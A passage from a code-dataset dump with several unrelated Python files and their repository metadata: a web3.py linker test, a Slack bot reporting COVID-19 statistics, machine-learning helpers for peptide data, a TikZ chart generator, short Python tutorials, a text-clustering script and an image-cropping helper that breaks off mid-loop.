main()\n","repo_name":"pupil-labs/densepose-module","sub_path":"src/pupil_labs/dense_pose/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":14877,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"36667783629","text":"import pytest\n\nfrom eth_utils import (\n remove_0x_prefix,\n to_hex,\n)\nfrom eth_utils.toolz import (\n assoc,\n)\n\nfrom ethpm.uri import (\n create_latest_block_uri,\n)\nfrom web3.tools.pytest_ethereum._utils import (\n contains_matching_uri,\n insert_deployment,\n pluck_matching_uri,\n)\nfrom web3.tools.pytest_ethereum.exceptions import (\n LinkerError,\n)\n\n\n@pytest.fixture\ndef chain_setup(w3):\n old_chain_id = remove_0x_prefix(to_hex(w3.eth.get_block(0)[\"hash\"]))\n block_hash = remove_0x_prefix(to_hex(w3.eth.get_block(\"earliest\").hash))\n old_chain_uri = f\"blockchain://{old_chain_id}/block/{block_hash}\"\n match_data = {\n old_chain_uri: {\"x\": \"x\"},\n f\"blockchain://1234/block/{block_hash}\": {\"x\": \"x\"},\n }\n no_match_data = {\n f\"blockchain://56775ac59d0774e6b603a79c4218efeb5653b99ba0ff14db983bac2662251a8a/block/{block_hash}\": { # noqa: E501\n \"x\": \"x\"\n }\n }\n return w3, match_data, no_match_data, old_chain_uri\n\n\ndef test_pluck_matching_uri(chain_setup):\n w3, match_data, no_match_data, old_chain_uri = chain_setup\n\n assert pluck_matching_uri(match_data, w3) == old_chain_uri\n with pytest.raises(LinkerError):\n assert pluck_matching_uri(no_match_data, w3)\n\n\ndef test_contains_matching_uri(chain_setup):\n w3, match_data, no_match_data, _ = chain_setup\n\n assert contains_matching_uri(match_data, w3) is True\n assert contains_matching_uri(no_match_data, w3) is False\n\n\ndef test_insert_deployment(escrow_deployer):\n w3 = escrow_deployer.package.w3\n escrow_package = escrow_deployer.package\n init_deployment_data = {\n \"contract_type\": \"Escrow\",\n \"address\": \"0x\",\n \"transaction\": \"0x\",\n \"block\": \"0x\",\n }\n new_deployment_data = {\n \"contract_type\": \"Escrow\",\n \"address\": \"0x123\",\n \"transaction\": \"0x123\",\n \"block\": \"0x123\",\n }\n w3.testing.mine(1)\n init_block_uri = create_latest_block_uri(w3, 0)\n alt_block_uri = init_block_uri[:15] + \"yxz123\" + init_block_uri[21:]\n init_block_deployment_data = {\n init_block_uri: {\"Other\": {\"x\": \"x\"}, \"Escrow\": init_deployment_data},\n alt_block_uri: {\"alt\": {\"x\": \"x\"}},\n }\n w3.testing.mine(1)\n new_block_uri = create_latest_block_uri(w3, 0)\n escrow_package.manifest = assoc(\n escrow_package.manifest, \"deployments\", init_block_deployment_data\n )\n updated_manifest = insert_deployment(\n escrow_package, \"Escrow\", new_deployment_data, new_block_uri\n )\n expected_deployments_data = {\n new_block_uri: {\"Other\": {\"x\": \"x\"}, \"Escrow\": new_deployment_data},\n alt_block_uri: {\"alt\": {\"x\": \"x\"}},\n }\n assert updated_manifest[\"deployments\"] == expected_deployments_data\n","repo_name":"ethereum/web3.py","sub_path":"tests/core/tools/pytest_ethereum/test_linker_utils.py","file_name":"test_linker_utils.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":4510,"dataset":"github-code","pt":"37"} +{"seq_id":"18735934277","text":"import json\nimport requests\nimport os\nimport errno\nfrom datetime import datetime\nfrom flask import Flask, Response\nfrom slackeventsapi import SlackEventAdapter\nfrom threading import Thread\nfrom slack import WebClient\n\n# This `app` represents your existing Flask app\napp = Flask(__name__)\n\n# greetings = [\"hello\", \"hello there\", \"hey\"]\nstates = [\"alaska\", \"alabama\", \"arkansas\", \"american samoa\", \"arizona\", \"california\", \"colorado\", \"connecticut\",\n \"district \", \"of columbia\", \"delaware\", \"florida\", \"georgia\", \"guam\", \"hawaii\", \"iowa\", \"idaho\", \"illinois\",\n \"indiana\", \"kansas\", \"kentucky\", \"louisiana\", \"massachusetts\", \"maryland\", \"maine\", \"michigan\", \"minnesota\",\n \"missouri\", \"mississippi\", \"montana\", \"north carolina\", \"north dakota\", \"nebraska\", \"new hampshire\",\n \"new jersey\", \"new mexico\", \"nevada\", \"new york\", \"ohio\", \"oklahoma\", \"oregon\", \"pennsylvania\", \"puerto rico\",\n \"rhode island\", \"south carolina\", \"south dakota\", \"tennessee\", \"texas\", \"utah\", \"virginia\", \"virgin islands\",\n \"vermont\", \"washington\", \"wisconsin\", \"west Virginia\", \"wyoming\"]\ncountries = ['Germany', 'France', 'China', 'United States']\nhelp_command = ['help']\n\n\nSLACK_SIGNING_SECRET = ''\nslack_token = ''\nVERIFICATION_TOKEN = ''\n\n# instantiating slack client\nslack_client = WebClient(slack_token)\n\n\n# An example of one of your Flask app's routes\n@app.route(\"/\")\ndef event_hook(request):\n json_dict = json.loads(request.body.decode(\"utf-8\"))\n if json_dict[\"token\"] != VERIFICATION_TOKEN:\n return {\"status\": 403}\n\n if \"type\" in json_dict:\n if json_dict[\"type\"] == \"url_verification\":\n response_dict = {\"challenge\": json_dict[\"challenge\"]}\n return response_dict\n return {\"status\": 500}\n return\n\n\nslack_events_adapter = SlackEventAdapter(\n SLACK_SIGNING_SECRET, \"/slack/events\", app\n)\n\n\n@slack_events_adapter.on(\"app_mention\")\ndef handle_message(event_data):\n def send_reply(value):\n event_data = value\n message = event_data[\"event\"]\n if message.get(\"subtype\") is None:\n command = message.get(\"text\")\n channel_id = message[\"channel\"]\n if any(item in command.lower() for item in help_command):\n message = \"@ me with any country, statefor detailed information. For specific counties, use 'county '.\"\n slack_client.chat_postMessage(channel=channel_id, text=message)\n elif any(state in command.lower() for state in states): # US states\n my_state = (command.split('>')[1].lstrip().title())\n response_data = get_state_stats(my_state)\n message = \"State: {} --- Cases: {} --- Deaths: {} --- Active: {}\" \\\n .format(response_data['state'], response_data['cases'], response_data['deaths'],\n response_data['active'])\n slack_client.chat_postMessage(channel=channel_id, text=message)\n elif any(country in command for country in countries):\n my_country = (command.split('>')[1].lstrip().title())\n response_data = get_country_stats(my_country)\n message = \"Country: {} --- Cases: {} --- Deaths: {} --- Active: {}\"\\\n .format(response_data['country'], response_data['cases'], response_data['deaths'], response_data['active'])\n slack_client.chat_postMessage(channel=channel_id, text=message)\n elif command.split('> ')[1].split(' ')[0] == 'county':\n # <> county Santa Clara\n my_county = (command.split('county ')[1])\n print('county command: -{}-'.format(my_county))\n response_data = get_county_stats(my_county)\n print(response_data)\n message = \"County: {} --- Cases: {} --- Deaths: {} --- Recovered: {}\" \\\n .format(response_data['county'], response_data['cases'], response_data['deaths'], response_data['recovered'])\n slack_client.chat_postMessage(channel=channel_id, text=message)\n else:\n print('unknown command')\n message = 'Unknown command'\n slack_client.chat_postMessage(channel=channel_id, text=message)\n\n thread = Thread(target=send_reply, kwargs={\"value\": event_data})\n thread.start()\n return Response(status=200)\n\n\ndef get_state_stats(state):\n query = 'https://disease.sh/v3/covid-19/states?sort=cases&yesterday=false'\n full_data = (requests.get(query))\n if full_data.status_code == 200:\n json_data = json.loads(full_data.text)\n\n # return (json_data)\n counter = 0\n for num in json_data:\n if num['state'] == state:\n response = json_data[counter]\n counter = counter + 1\n print(response)\n return {'state': state, 'cases': response['cases'], 'deaths': response['deaths'], 'active': response['active']}\n\n\ndef get_country_stats(country):\n query = 'https://disease.sh/v3/covid-19/countries/{}?yesterday=true&strict=true'.format(country)\n full_data = (requests.get(query))\n if full_data.status_code == 200:\n json_data = json.loads(full_data.text)\n return {'country': country, 'cases': json_data['cases'], 'deaths': json_data['deaths'],\n 'active': json_data['active']}\n\n\ndef get_county_stats(county):\n query = 'https://disease.sh/v3/covid-19/jhucsse/counties/{}'.format(county)\n full_data = (requests.get(query))\n if full_data.status_code == 200:\n json_data = json.loads(full_data.text)\n return {'county': county, 'cases': json_data[0]['stats']['confirmed'], 'deaths': json_data[0]['stats']['deaths'],\n 'recovered': json_data[0]['stats']['recovered']}\n\n\n# Start the server on port 3000\nif __name__ == \"__main__\":\n app.run(port=3000)\n\n","repo_name":"PikaPreme/COVID19-SlackBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6703881631","text":"import pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\nimport seaborn as sns\nfrom matplotlib.patches import Rectangle\nfrom IPython.display import display\nfrom scipy.stats import hmean\nfrom sklearn.metrics import precision_recall_curve, confusion_matrix, accuracy_score, roc_auc_score, f1_score, \\\n precision_score, recall_score, average_precision_score\nimport matplotlib.pyplot as plt\n\n\ndef load_and_filter_dataset(path_dfvz='../DataFiles/experimental_data_set.csv',\n path_df20='../DataFiles/df20.csv',\n apply_filter='CPXXX'):\n \"\"\"\n Loads dfvz and df20 dataframes based on provided paths. Can also apply filter to the data as needed.\n Args:\n path_dfvz: filepath to dfvz (default '../DataFiles/experiment_data_set.csv')\n path_df20: filepath to df20 (default '../DataFiles/df20.csv')\n apply_filter: Indicates which type of filter to apply None, 'CPXXX', 'PXXX','C' (default 'CPXXX')\n\n Returns:\n Returns dfvz, df20\n \"\"\"\n\n dfvz = pd.read_csv(path_dfvz, engine='c', index_col=0)\n df20 = pd.read_csv(path_df20, engine='c', index_col=0)\n len_before_filter = np.array([len(dfvz), len(df20)])\n\n if apply_filter is not None:\n idx_filtered = filter_data_idx(dfvz, apply_filter)\n dfvz = dfvz.loc[idx_filtered]\n df20 = df20.loc[idx_filtered]\n len_after_filter = np.array([len(dfvz), len(df20)])\n print(f'Len Before Filtering for DFVZ and DF20: {len_before_filter}\\nLen After Filter: {len_after_filter}')\n\n return dfvz, df20\n\n\ndef filter_data_idx(df, filter_seqs='CPXXX'):\n \"\"\"\n Take in a data frame and returns an index of items that should remain once the filter is applied.\n Args:\n df: dataframe to use for filtering. Must contain a column name 'seq' that has sequences to filter from.\n filter_seqs: String. Must be one of 'CPXXX', 'PXXX', 'C' indicating the type of filter to apply (default 'CPXXX')\n\n Returns:\n Returns none if an incorrect filter_seqs argument is provided.\n Otherwise, returns the index as a list of the sequences that should remain in\n the df after applying the filter\n \"\"\"\n # Remove all sequences with C, PXXX but not PPXX\n # Find all sequences containing cysteines:\n filter_cysteine = df['seq'].str.contains('C')\n # Find all sequences containing PXXX but not PPXX\n filter_pxxx = df['seq'].str.contains('(^P[^P])')\n # Finding all sequences that either contain a C or PPXX or both\n filter_c_pxxx = df['seq'].str.contains('(^P[^P])|([C])')\n\n print(f\"\"\"\n DF Contains: \n Sequences Containing C: {np.count_nonzero(filter_cysteine)}\n Sequences Containing PXXX (Not PPXX): {np.count_nonzero(filter_pxxx)}\n Combine the two above filters with or: {np.count_nonzero(filter_c_pxxx)} \n \"\"\")\n\n if filter_seqs.upper() == 'C':\n idx_inverted = df[~filter_cysteine].index.to_list()\n elif filter_seqs.upper() == 'PXXX':\n idx_inverted = df[~filter_pxxx].index.to_list()\n elif filter_seqs.upper() == 'CPXXX':\n idx_inverted = df[~filter_c_pxxx].index.to_list()\n else:\n print('Invalid Filter Entry. Please select one of these options: \"C\", \"PXXX\", \"CPXXX\"')\n return None\n\n return idx_inverted\n\n\ndef pre_process_data(dfvz, df20, threshold=0.05):\n \"\"\"\n Scale and pre-process data and store it in a dictionary that can be easily accessed!\n\n Args:\n dfvz: dfvz dataframe containing chemical features\n df20: df20 dataframe containing sequence patterns\n threshold: threshold to use to mark high and low classes. I.e what percentile of the population will be\n labelled 'HIGH'. Same threshold is used for 'LOW'. Be default this is set to top 5 percentile and bottom\n 5 percentile (0.05)\n\n Returns:\n X_dict: dictionary of features (both unscaled and scaled)\n Xname_dict: dictionary of feature keys and corresponding column names from dataframes\n y_dict: dictionary containing labels encoded in 4 different formats ('real', '3class', 'low', 'high')\n \"\"\"\n\n standard_scaler = preprocessing.StandardScaler()\n\n Xp = df20.loc[:, '..AA':'V...'].values # sequence pattern descriptors #(67278, 2396)\n Xp_names = df20.loc[:, '..AA':'V...'].columns\n standard_scaler.fit(Xp)\n Xp_s = standard_scaler.transform(Xp)\n\n Xz = dfvz.loc[:, 'z1.1':'z4.3'].values # zscale descriptors #(67278, 12)\n Xz_names = dfvz.loc[:, 'z1.1':'z4.3'].columns\n standard_scaler.fit(Xz)\n Xz_s = standard_scaler.transform(Xz)\n\n Xv = dfvz.loc[:, 'vhse1.1':'vhse4.8'].values # vhse descriptors #(67278, 32)\n Xv_names = dfvz.loc[:, 'vhse1.1':'vhse4.8'].columns\n standard_scaler.fit(Xv)\n Xv_s = standard_scaler.transform(Xv)\n\n Xvz_names = list(Xz_names) + list(Xv_names) # zscale and vhse combined #(67278, 44)\n Xvz = dfvz.loc[:, Xvz_names].values\n standard_scaler.fit(Xvz)\n Xvz_s = standard_scaler.transform(Xvz)\n\n Xpvz_names = list(Xvz_names) + list(Xp_names) # pattern and zscale, vhse combined #(67278, 2440)\n Xpvz = pd.concat([dfvz.loc[:, Xvz_names], df20.loc[:, list(Xp_names)]], axis=1).values\n standard_scaler.fit(Xpvz)\n Xpvz_s = standard_scaler.transform(Xpvz)\n\n y = dfvz['log.label'].values.reshape(-1, 1)\n\n # The following dictionary makes it much easier to main and access data.\n keys = ['Xp', 'Xp_s', 'Xz', 'Xz_s', 'Xv', 'Xv_s', 'Xvz', 'Xvz_s', 'Xpvz', 'Xpvz_s']\n vals = [Xp, Xp_s, Xz, Xz_s, Xv, Xv_s, Xvz, Xvz_s, Xpvz, Xpvz_s]\n name_vals = [Xp_names, Xp_names, Xz_names, Xz_names, Xv_names, Xv_names, Xvz_names, Xvz_names, Xpvz_names,\n Xpvz_names]\n\n X_dict = dict(zip(keys, vals))\n Xname_dict = dict(zip(keys, name_vals))\n\n # Y - Values, subdivided according to this:\n # Real: Real Values used for regressor\n # 3class: 0, 1, 2 - Bottom 5%, Middle 90%, Top 5%\n threshold = threshold\n y_three_class = pd.qcut(dfvz['log.label'], q=[0, threshold, 1 - threshold, 1], labels=False).values\n y_low = np.array([True if x == 0 else False for x in y_three_class])\n y_high = np.array([True if x == 2 else False for x in y_three_class])\n ykey = ['real', '3class', 'low', 'high']\n yval = [y, y_three_class, y_low, y_high]\n y_dict = dict(zip(ykey, yval))\n\n return X_dict, Xname_dict, y_dict\n\n\ndef ttlocate(seqx):\n aa = ['R', 'K', 'Q', 'E', 'D', 'N', 'Y', 'P', 'T', 'S', 'H', 'A', 'G', 'W', 'M', 'F', 'L', 'V', 'I', 'C']\n row_i1 = aa.index(seqx[0])\n row_i2 = aa.index(seqx[2])\n col_i1 = aa.index(seqx[1])\n col_i2 = aa.index(seqx[3])\n row_i = (row_i1 * 20) + row_i2\n col_i = (col_i1 * 20) + col_i2\n return (row_i, col_i)\n\n\n# function to get 20x20 matrix given array of aa sequences and DC label\ndef ttmatrix(seqs, dc):\n # define empty matrix to fill in\n ttmat = np.full((400, 400), np.nan)\n for i, s in enumerate(seqs):\n # ttmat[ttlocate(s)[0],ttlocate(s)[1]] = dc[i]\n ttmat[ttlocate(s)] = dc[i]\n mask = np.isnan(ttmat)\n return ttmat, mask\n\n\n# plot the ttmatrix, and highlight the query if present\ndef ttplot(seqs, \n dc, \n query=None, \n title='Position of queried sequence/s in 20x20 plot (log (deep conversion))',\n vmin=None,\n vmax=None):\n \"\"\"Plots a 20x20 Matrix based on provided Sequences and LogDC values. The query is optional and draws a yellow\n square around the queried sequence\n\n Args:\n vmin:\n vmax:\n title:\n seqs ([String]): array of sequences to build the ttplot with\n dc ([Float]): array of log DC values corresponding description to the sequences.\n query (list, optional): List of query sequences to see where they might show up on the 20x20 Plot. Defaults to [].\n\n Returns:\n [type]: [description]\n \"\"\"\n if query is None:\n query = []\n ttmat, mask = ttmatrix(seqs, dc)\n\n aa = ['R', 'K', 'Q', 'E', 'D', 'N', 'Y', 'P', 'T', 'S', 'H', 'A', 'G', 'W', 'M', 'F', 'L', 'V', 'I', 'C']\n ticks = [[a[0]] + [''] * 19 for a in aa]\n ticks = [j for i in ticks for j in i]\n sns.set(rc={'figure.figsize': (9, 6)})\n sns.set(font_scale=1.3)\n\n # if dc values are binary then use simple color map\n if len(np.unique(dc)) == 2:\n cm = 'Blues'\n \n elif len(np.unique(dc)) == 3:\n cm = ['#2AB7CA', '#D6D6D6', '#FE4A49']\n \n else:\n cm = 'jet'\n\n# cm = 'Blues' if len(np.unique(dc)) == 2 else 'jet'\n # comment out above comment as we have new logic.\n\n ax = sns.heatmap(ttmat, cmap=cm, xticklabels=ticks, yticklabels=ticks, mask=mask, vmin=vmin, vmax=vmax)\n ax.set_title(title, pad=20)\n ax.set(facecolor='#F5F5F5')\n\n if len(query) > 0:\n for q in query:\n query_pos = ttlocate(q)[1], ttlocate(q)[0]\n ax.add_patch(Rectangle(query_pos, 1, 1, fill=True, edgecolor='red', lw=8))\n \n\n return ax.figure\n\n\ndef evalplots(y_test, y_score, y_pred, labels, name_modifier):\n precision, recall, thr = precision_recall_curve(y_test, y_score)\n average_precision = average_precision_score(y_test, y_score)\n f1score = f1_score(y_test, y_pred)\n f1vec = [hmean([precision[i], recall[i]]) for i in range(sum(recall != 0))]\n\n # plt.plot([i/len(f1vec) for i in range(len(f1vec))],f1vec,color='r',alpha=0.2)\n plt.step(recall, precision, color='b', alpha=0.2, where='post')\n plt.fill_between(recall, precision, step='post', alpha=0.2, color='b')\n\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n plt.ylim([0.0, 1.05])\n plt.xlim([0.0, 1.0])\n plt.title('2-class Precision-Recall curve: AP={0:0.2f}, F1={1:0.2f}'.format(average_precision, f1score))\n plt.tight_layout()\n plt.savefig(f'figures/precision_recall_{name_modifier}.svg')\n plt.savefig(f'figures/precision_recall_{name_modifier}.png', dpi=300)\n plt.show()\n\n plt.step(thr[recall[:-1] != 0], f1vec, color='r', alpha=0.2, where='post')\n plt.fill_between(thr[recall[:-1] != 0], f1vec, step='post', alpha=0.2, color='r')\n plt.xlabel('Threshold')\n plt.ylabel('Estimated F1-Scores')\n plt.ylim([0.0, 1.0])\n plt.axvline(x=0.5, color='r')\n plt.title('Threshold Vs F1-Score: Max F1 ={0:0.2f}, Reported F1={1:0.2f}'.format(np.max(f1vec), f1score))\n plt.tight_layout()\n plt.savefig(f'figures/threshold_f1_{name_modifier}.svg')\n plt.savefig(f'figures/threshold_f1_{name_modifier}.png', dpi=300)\n plt.show()\n\n cm = confusion_matrix(y_test, y_pred, labels)\n print('Recall: {0:0.2f}'.format(recall_score(y_test, y_pred)))\n print('Precision: {0:0.2f}'.format(precision_score(y_test, y_pred)))\n display(pd.DataFrame(cm, columns=['Negative', 'Positive'], index=['Negative', 'Positive']))\n fig = plt.figure()\n ax = fig.add_subplot(111)\n cax = ax.matshow(cm, cmap='hot')\n print('\\n')\n plt.title('Confusion matrix : Acc={0:0.2f}'.format(accuracy_score(y_test, y_pred)))\n fig.colorbar(cax)\n ax.set_xticklabels([''] + labels)\n ax.set_yticklabels([''] + labels)\n plt.xlabel('Predicted')\n plt.ylabel('True')\n plt.show()\n print('--------------------------------------------------------')\n","repo_name":"sharyar/GESAR-V2","sub_path":"MLNotebooks/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":11140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17383079476","text":"#!/usr/bin/env python\n# coding: utf8\n\n#Inhalt\n\n#Aufruf:\n# exec(open(\"Funktionen/funktionen.py\").read())\n\ndef saeulenKreisStreifenDiagrammeZeichnen(werte=[['VW','Mercedes','Audi','BMW','Honda',],[250,200,180,170,100]],titel='Autos pro Stunde',typ='LSG',streifen=False):\n zuordnen=True if (typ=='zuordnen') else False\n zeichnenEinfarben=True if (typ=='ZeichnenUndEinfaerben') else False\n zeichnen=True if (typ=='Zeichnen') else False\n zeichnenUndBerechnen=True if (typ=='ZeichnenUndBerechnen') else False\n alles=True if (typ=='alles') else False\n farben=tikzFarben[1:]\n R=3\n pWerte=[x/sum(werte[1])*100 for x in werte[1]]\n if not zeichnenUndBerechnen:\n werte.append([F'{strNW(round(x+0.0000000001),True)} \\%' for x in pWerte])\n else:\n werte.append([' ' for x in pWerte])\n tikzcommand=['\\\\tikzstyle{background grid}=[draw, black!15,step=.5cm]']\n tikzcommand.append('\\\\begin{tikzpicture}[show background grid]')\n dia,hoehe=saeulenDiagrammTikzVorgBreiteHoehe(werte=werte,yAchse=[0,max(werte[1]),20],ylabel=titel,urspr=[0,0],mitUmrandung=False,gibHoeheZurueck=True,farben=farben,typ=typ)\n if not alles:\n tikzcommand=tikzcommand+dia\n if streifen:\n hoehe=hoehe+0.5\n tikzcommand=tikzcommand+tikzTabelle(tabelle=werte,dim=[2.0,0.5],newCBuchst='X',tabellenPos=[0,hoehe+3],mitUmrandung=False)\n if streifen:\n streifenUrsp=[0,hoehe]\n streifenL=10\n if not alles:\n tikzcommand.append(F'\\\\draw[draw=black] ({streifenUrsp[0]},{streifenUrsp[1]}) rectangle ++(10,1);')\n l = 0\n if not (zeichnen or zeichnenUndBerechnen or alles):\n for i in range(len(pWerte)):\n p = pWerte[i]\n if zeichnenEinfarben:\n tikzcommand.append(F'\\\\draw[thick] ({l},{streifenUrsp[1]}) rectangle ++({p/100*10},1);')\n else:\n tikzcommand.append( F'\\\\draw[thick,pattern=north west lines, pattern color={farben[i]}] ({l},{streifenUrsp[1]}) rectangle ++({p/100*10},1);')\n if not (zuordnen or zeichnenEinfarben):\n tikzcommand.append( F'\\\\node at ({l+p/100*10/2},{streifenUrsp[1] +0.5}) {{\\\\textbf{{ {werte[0][i]} }} }};')\n l=l+p/100*10\n else:\n kreisUrsp=[10,hoehe-R]\n if not alles:\n tikzcommand.append(F'\\\\draw ({kreisUrsp[0]},{kreisUrsp[1]}) circle ({R} cm);')\n tikzcommand.append(F'\\\\draw[fill=black] ({kreisUrsp[0]},{kreisUrsp[1]}) circle (0.05 cm);')\n w=0\n if not (zeichnen or zeichnenUndBerechnen or alles):\n for i in range(len(pWerte)):\n p=pWerte[i]\n if zeichnenEinfarben:\n tikzcommand.append(F'\\\\draw[thick] ({kreisUrsp[0]},{kreisUrsp[1]}) -- +({w}:{R}) arc ({w}:{w+p/100*360}:{R}) -- ({kreisUrsp[0]},{kreisUrsp[1]});')\n else:\n tikzcommand.append(F'\\\\draw[thick,pattern=north west lines, pattern color={farben[i]}] ({kreisUrsp[0]},{kreisUrsp[1]}) -- +({w}:{R}) arc ({w}:{w+p/100*360}:{R}) -- ({kreisUrsp[0]},{kreisUrsp[1]});')\n if not (zuordnen or zeichnenEinfarben):\n tikzcommand.append(F'\\\\node[rotate={w+p/100*360/2}] at ($({kreisUrsp[0]},{kreisUrsp[1]})+({w+p/100*360/2}:{R/2})$) {{\\\\textbf{{ {werte[0][i]} }} }};')\n w=w+p/100*360\n tikzcommand.append('\\\\end{tikzpicture}')\n return tikzcommand\n","repo_name":"jochen-rath/Arbeitsblattgenerator","sub_path":"Funktionen/funktionenTikzDiagrammAufgabe.py","file_name":"funktionenTikzDiagrammAufgabe.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"de","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"34415422417","text":"# def describe_pet(animal_type='cat',pet_name):\n# 有问题,非默认值形参必须在默认值形参前面\nanimal = 'cat'\n#函数默认值只在定义函数时初始化一次,如果默认值是列表或字典,可以使用函数来修改\ndef describe_pet(pet_name,animal_type=animal):\n print(f\"I have a {animal_type}, it's name is {pet_name.title()}.\")\n animal = 'dog'\nanimal = 'dog'\n\ndescribe_pet('kiko')\ndescribe_pet(pet_name='kiko')\n#animal_type='cat'是默认值,如果调用函数时给animal_type提供了实参,python将忽略这个形参的默认值\ndescribe_pet('dabai','dog')","repo_name":"RzMY/Study","sub_path":"Python/8.2.3.py","file_name":"8.2.3.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35907955460","text":"# you should download from http://mlcomp.org/datasets/379, and move the data under data-clustering\n\nimport sklearn.datasets\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport nltk.stem\nfrom sklearn.cluster import KMeans\nimport scipy as sp\n\nMLCOMP_DIR = \"./data-clustering\"\n\nnew_post = \\\n \"\"\"Disk drive problems. Hi, I have a problem with my hard disk.\nAfter 1 year it is working only sporadically now.\nI tried to format it, but now it doesn't boot any more.\nAny ideas? Thanks.\n\"\"\"\n\ngroups = ['comp.graphics', 'comp.os.ms-windows.misc', 'comp.sys.ibm.pc.hardware', 'comp.sys.mac.hardware', 'comp.windows.x','sci.space']\ntrain_data = sklearn.datasets.load_mlcomp(\"20news-18828\", \"train\", mlcomp_root=MLCOMP_DIR, categories=groups)\nprint(train_data.target_names)\nprint(len(train_data.filenames))\n\nenglish_stemmer = nltk.stem.SnowballStemmer('english')\n\nclass StemmedTfidfVectorizer(TfidfVectorizer):\n\n def build_analyzer(self):\n analyzer = super(TfidfVectorizer,self).build_analyzer()\n return lambda doc: (\n english_stemmer.stem(w) for w in analyzer(doc)\n )\n\n\nvectorizer = StemmedTfidfVectorizer(min_df=10, max_df=0.5, stop_words='english', decode_error='ignore')\nvectorized = vectorizer.fit_transform(train_data.data)\n\nnum_clusters = 50\nkm = KMeans(n_clusters=num_clusters,init='random',n_init=1,verbose=1)\nkm.fit(vectorized)\n\nprint(km.labels_)\nprint(km.labels_.shape)\n\nnew_post_vec = vectorizer.transform([new_post])\nnew_post_label = km.predict(new_post_vec)[0]\nprint(new_post_label)\n\nsimiliar_indices = (km.labels_ == new_post_label).nonzero()[0]\n\nsimilar = []\nfor i in similiar_indices:\n dist = sp.linalg.norm((new_post_vec - vectorized[i]).toarray())\n similar.append((dist, train_data.data[i]))\nsimilar = sorted(similar)\n\nprint(similar[0])\nprint(similar[int(len(similar)/2)])\nprint(similar[-1])\n\n","repo_name":"aha-oretama/BuildingMachineLearningSystemsWithPython","sub_path":"ch3/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22991377015","text":"# Python 有以下内置数据类型\n# 字符串类型:str\n# 数值类型:int,float,complex\n# 序列类型: list,tuple,range\n# 映射类型:dict\n# 集合类型:set,frozenset\n# 布尔类型:bool\n# 二进制类型:bytes,bytearray,memoryview\n\n# 可以使用 type() 函数获取数据类型\n\n# 当为变量赋值时,会设置相应的数据类型\nv1 = \"Python\"\nprint(type(v1)) # \n\nv2 = 2023\nprint(type(v2)) # \n\nv3 = 3.14\nprint(type(v3)) # \n\nv4 = 1 + 2j\nprint(type(v4)) # \n\nv5 = [\"apple\", \"banana\", \"coconut\"]\nprint(type(v5)) # \n\nv6 = (\"durian\", \"grape\", \"orange\")\nprint(type(v6)) # \n\nv7 = range(10)\nprint(type(v7)) # \n\nv8 = {\"name\": \"Felix\", \"age\": 22}\nprint(type(v8)) # \n\nv9 = {\"apple\", \"banana\", \"cherry\"}\nprint(type(v9)) # \n\nv10 = frozenset({\"apple\", \"banana\", \"cherry\"})\nprint(type(v10)) # \n\nv11 = True\nprint(type(v11)) # \n\nv12 = b\"Hello\"\nprint(type(v12)) # \n\nv13 = bytearray(10)\nprint(type(v13)) # \n\nv14 = memoryview(bytes(10))\nprint(type(v14)) # \n\n# 使用构造函数指定数据类型\nx1 = str(\"Python\")\nx2 = int(2023)\nx3 = float(3.14)\nx4 = complex(1 + 2j)\nx5 = list([\"apple\", \"banana\", \"cherry\"])\nx6 = tuple((\"apple\", \"banana\", \"cherry\"))\nx7 = range(10)\nx8 = dict(name=\"Felix\", age=22)\nx9 = set((\"apple\", \"banana\", \"cherry\"))\nx10 = frozenset((\"apple\", \"banana\", \"cherry\"))\nx11 = bool(5)\nx12 = bytes(1)\nx13 = bytearray(1)\nx14 = memoryview(bytes(1))\n\n","repo_name":"coder-felixovo/python-tour","sub_path":"01-basics/02-数据类型.py","file_name":"02-数据类型.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31198596610","text":"import numpy as np\nimport os\nfrom PIL import Image\n\ndef return_class():\n train_path = \"stage2/train_source/\"\n train = os.listdir(train_path)\n class_names = [i[:-4] for i in train]\n return class_names\n\n\ndef load_picture():\n train_path = \"stage2/train_source/\"\n test_path = \"stage2/test_source/\"\n train = os.listdir(train_path)\n train_imgs = []\n valid_imgs = []\n \n t = (0,0,675,375)\n\n # mg = Image.open(train_path+train[0])\n # p = make_position()\n # i1 = mg.crop(p[0])\n # print(mg.size)\n # print(i1.size)\n # print(mg.crop(t).size)\n # print(p[0])\n\n for i in train:\n train_imgs += [Image.open(train_path+i).resize((750,750)).convert('RGB') ]\n # valid_imgs += [Image.open(test_path+i).crop(t).resize((224,224)).convert('RGB') ]\n valid_imgs += [Image.open(test_path+i).resize((224,224)).convert('RGB') ]\n classes = list(range(len(train_imgs)))\n return train_imgs, valid_imgs\n\ndef make_lot_pic(img):\n x,y = img.size\n # position = [ (0,0,x//2,y//2), (x//2,0,x,y//2), (0,y//2,x//2,y), (x//2,y//2,x,y) ]\n position = make_position()\n cropped_img = []\n for i in position:\n t = img.crop(i).resize((224,224))\n cropped_img += [t]\n return cropped_img\n\ndef make_position():\n position = []\n x1 = 750-224\n y1 = 750-224\n for i in range(0,x1,50):\n for j in range(0,y1,50):\n position.append([i,j,i+224,j+224])\n\n x1 = 750 - 500\n y1 = 750 - 500\n for i in range(0,x1,60):\n for j in range(0,y1,60):\n position.append([i,j,i+500,j+500])\n\n x1 = 750 - 600\n y1 = 750 - 600\n for 